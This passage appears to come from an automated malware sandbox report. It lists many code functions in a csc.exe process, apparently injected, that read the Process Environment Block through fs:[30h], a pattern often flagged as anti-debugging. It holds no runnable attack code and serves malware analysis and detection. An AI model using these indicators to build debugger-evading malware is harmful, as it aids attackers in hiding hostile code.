            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D4144 mov ecx, dword ptr fs:[00000030h]4_2_057D4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D4144 mov eax, dword ptr fs:[00000030h]4_2_057D4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D4144 mov eax, dword ptr fs:[00000030h]4_2_057D4144
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058061C3 mov eax, dword ptr fs:[00000030h]4_2_058061C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058061C3 mov eax, dword ptr fs:[00000030h]4_2_058061C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05770124 mov eax, dword ptr fs:[00000030h]4_2_05770124
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058161E5 mov eax, dword ptr fs:[00000030h]4_2_058161E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057EA118 mov ecx, dword ptr fs:[00000030h]4_2_057EA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057EA118 mov eax, dword ptr fs:[00000030h]4_2_057EA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057EA118 mov eax, dword ptr fs:[00000030h]4_2_057EA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057EA118 mov eax, dword ptr fs:[00000030h]4_2_057EA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057701F8 mov eax, dword ptr fs:[00000030h]4_2_057701F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05800115 mov eax, dword ptr fs:[00000030h]4_2_05800115
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE1D0 mov eax, dword ptr fs:[00000030h]4_2_057BE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE1D0 mov eax, dword ptr fs:[00000030h]4_2_057BE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE1D0 mov ecx, dword ptr fs:[00000030h]4_2_057BE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE1D0 mov eax, dword ptr fs:[00000030h]4_2_057BE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057BE1D0 mov eax, dword ptr fs:[00000030h]4_2_057BE1D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C019F mov eax, dword ptr fs:[00000030h]4_2_057C019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C019F mov eax, dword ptr fs:[00000030h]4_2_057C019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C019F mov eax, dword ptr fs:[00000030h]4_2_057C019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C019F mov eax, dword ptr fs:[00000030h]4_2_057C019F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A197 mov eax, dword ptr fs:[00000030h]4_2_0573A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A197 mov eax, dword ptr fs:[00000030h]4_2_0573A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A197 mov eax, dword ptr fs:[00000030h]4_2_0573A197
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FC188 mov eax, dword ptr fs:[00000030h]4_2_057FC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FC188 mov eax, dword ptr fs:[00000030h]4_2_057FC188
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05780185 mov eax, dword ptr fs:[00000030h]4_2_05780185
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576C073 mov eax, dword ptr fs:[00000030h]4_2_0576C073
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05742050 mov eax, dword ptr fs:[00000030h]4_2_05742050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C6050 mov eax, dword ptr fs:[00000030h]4_2_057C6050
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058060B8 mov eax, dword ptr fs:[00000030h]4_2_058060B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_058060B8 mov ecx, dword ptr fs:[00000030h]4_2_058060B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D6030 mov eax, dword ptr fs:[00000030h]4_2_057D6030
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A020 mov eax, dword ptr fs:[00000030h]4_2_0573A020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573C020 mov eax, dword ptr fs:[00000030h]4_2_0573C020
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E016 mov eax, dword ptr fs:[00000030h]4_2_0575E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E016 mov eax, dword ptr fs:[00000030h]4_2_0575E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E016 mov eax, dword ptr fs:[00000030h]4_2_0575E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E016 mov eax, dword ptr fs:[00000030h]4_2_0575E016
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C4000 mov ecx, dword ptr fs:[00000030h]4_2_057C4000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E2000 mov eax, dword ptr fs:[00000030h]4_2_057E2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573C0F0 mov eax, dword ptr fs:[00000030h]4_2_0573C0F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057820F0 mov ecx, dword ptr fs:[00000030h]4_2_057820F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0573A0E3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C60E0 mov eax, dword ptr fs:[00000030h]4_2_057C60E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057480E9 mov eax, dword ptr fs:[00000030h]4_2_057480E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C20DE mov eax, dword ptr fs:[00000030h]4_2_057C20DE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D80A8 mov eax, dword ptr fs:[00000030h]4_2_057D80A8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574208A mov eax, dword ptr fs:[00000030h]4_2_0574208A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E437C mov eax, dword ptr fs:[00000030h]4_2_057E437C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C035C mov eax, dword ptr fs:[00000030h]4_2_057C035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C035C mov eax, dword ptr fs:[00000030h]4_2_057C035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C035C mov eax, dword ptr fs:[00000030h]4_2_057C035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C035C mov ecx, dword ptr fs:[00000030h]4_2_057C035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C035C mov eax, dword ptr fs:[00000030h]4_2_057C035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C035C mov eax, dword ptr fs:[00000030h]4_2_057C035C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C2349 mov eax, dword ptr fs:[00000030h]4_2_057C2349
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573C310 mov ecx, dword ptr fs:[00000030h]4_2_0573C310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05760310 mov ecx, dword ptr fs:[00000030h]4_2_05760310
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A30B mov eax, dword ptr fs:[00000030h]4_2_0577A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A30B mov eax, dword ptr fs:[00000030h]4_2_0577A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577A30B mov eax, dword ptr fs:[00000030h]4_2_0577A30B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F0 mov eax, dword ptr fs:[00000030h]4_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F0 mov eax, dword ptr fs:[00000030h]4_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575E3F0 mov eax, dword ptr fs:[00000030h]4_2_0575E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057763FF mov eax, dword ptr fs:[00000030h]4_2_057763FF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057503E9 mov eax, dword ptr fs:[00000030h]4_2_057503E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E43D4 mov eax, dword ptr fs:[00000030h]4_2_057E43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E43D4 mov eax, dword ptr fs:[00000030h]4_2_057E43D4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057FC3CD mov eax, dword ptr fs:[00000030h]4_2_057FC3CD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A3C0 mov eax, dword ptr fs:[00000030h]4_2_0574A3C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057483C0 mov eax, dword ptr fs:[00000030h]4_2_057483C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C63C0 mov eax, dword ptr fs:[00000030h]4_2_057C63C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0580A352 mov eax, dword ptr fs:[00000030h]4_2_0580A352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738397 mov eax, dword ptr fs:[00000030h]4_2_05738397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738397 mov eax, dword ptr fs:[00000030h]4_2_05738397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05738397 mov eax, dword ptr fs:[00000030h]4_2_05738397
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576438F mov eax, dword ptr fs:[00000030h]4_2_0576438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576438F mov eax, dword ptr fs:[00000030h]4_2_0576438F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E388 mov eax, dword ptr fs:[00000030h]4_2_0573E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E388 mov eax, dword ptr fs:[00000030h]4_2_0573E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573E388 mov eax, dword ptr fs:[00000030h]4_2_0573E388
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F0274 mov eax, dword ptr fs:[00000030h]4_2_057F0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744260 mov eax, dword ptr fs:[00000030h]4_2_05744260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744260 mov eax, dword ptr fs:[00000030h]4_2_05744260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05744260 mov eax, dword ptr fs:[00000030h]4_2_05744260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573826B mov eax, dword ptr fs:[00000030h]4_2_0573826B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573A250 mov eax, dword ptr fs:[00000030h]4_2_0573A250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05746259 mov eax, dword ptr fs:[00000030h]4_2_05746259
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C8243 mov eax, dword ptr fs:[00000030h]4_2_057C8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C8243 mov ecx, dword ptr fs:[00000030h]4_2_057C8243
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0573823B mov eax, dword ptr fs:[00000030h]4_2_0573823B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502E1 mov eax, dword ptr fs:[00000030h]4_2_057502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502E1 mov eax, dword ptr fs:[00000030h]4_2_057502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502E1 mov eax, dword ptr fs:[00000030h]4_2_057502E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0574A2C3 mov eax, dword ptr fs:[00000030h]4_2_0574A2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502A0 mov eax, dword ptr fs:[00000030h]4_2_057502A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057502A0 mov eax, dword ptr fs:[00000030h]4_2_057502A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov ecx, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D62A0 mov eax, dword ptr fs:[00000030h]4_2_057D62A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E284 mov eax, dword ptr fs:[00000030h]4_2_0577E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0577E284 mov eax, dword ptr fs:[00000030h]4_2_0577E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0283 mov eax, dword ptr fs:[00000030h]4_2_057C0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0283 mov eax, dword ptr fs:[00000030h]4_2_057C0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C0283 mov eax, dword ptr fs:[00000030h]4_2_057C0283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057D8D6B mov eax, dword ptr fs:[00000030h]4_2_057D8D6B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05814DAD mov eax, dword ptr fs:[00000030h]4_2_05814DAD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740D59 mov eax, dword ptr fs:[00000030h]4_2_05740D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740D59 mov eax, dword ptr fs:[00000030h]4_2_05740D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05740D59 mov eax, dword ptr fs:[00000030h]4_2_05740D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05748D59 mov eax, dword ptr fs:[00000030h]4_2_05748D59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05808DAE mov eax, dword ptr fs:[00000030h]4_2_05808DAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05808DAE mov eax, dword ptr fs:[00000030h]4_2_05808DAE
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057C8D20 mov eax, dword ptr fs:[00000030h]4_2_057C8D20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736D10 mov eax, dword ptr fs:[00000030h]4_2_05736D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736D10 mov eax, dword ptr fs:[00000030h]4_2_05736D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736D10 mov eax, dword ptr fs:[00000030h]4_2_05736D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05774D1D mov eax, dword ptr fs:[00000030h]4_2_05774D1D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F8D10 mov eax, dword ptr fs:[00000030h]4_2_057F8D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057F8D10 mov eax, dword ptr fs:[00000030h]4_2_057F8D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD00 mov eax, dword ptr fs:[00000030h]4_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD00 mov eax, dword ptr fs:[00000030h]4_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0575AD00 mov eax, dword ptr fs:[00000030h]4_2_0575AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_05736DF6 mov eax, dword ptr fs:[00000030h]4_2_05736DF6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576CDF0 mov eax, dword ptr fs:[00000030h]4_2_0576CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_0576CDF0 mov ecx, dword ptr fs:[00000030h]4_2_0576CDF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E0DF0 mov eax, dword ptr fs:[00000030h]4_2_057E0DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 4_2_057E0DF0 mov eax, dword ptr fs:[00000030h]4_2_057E0DF0
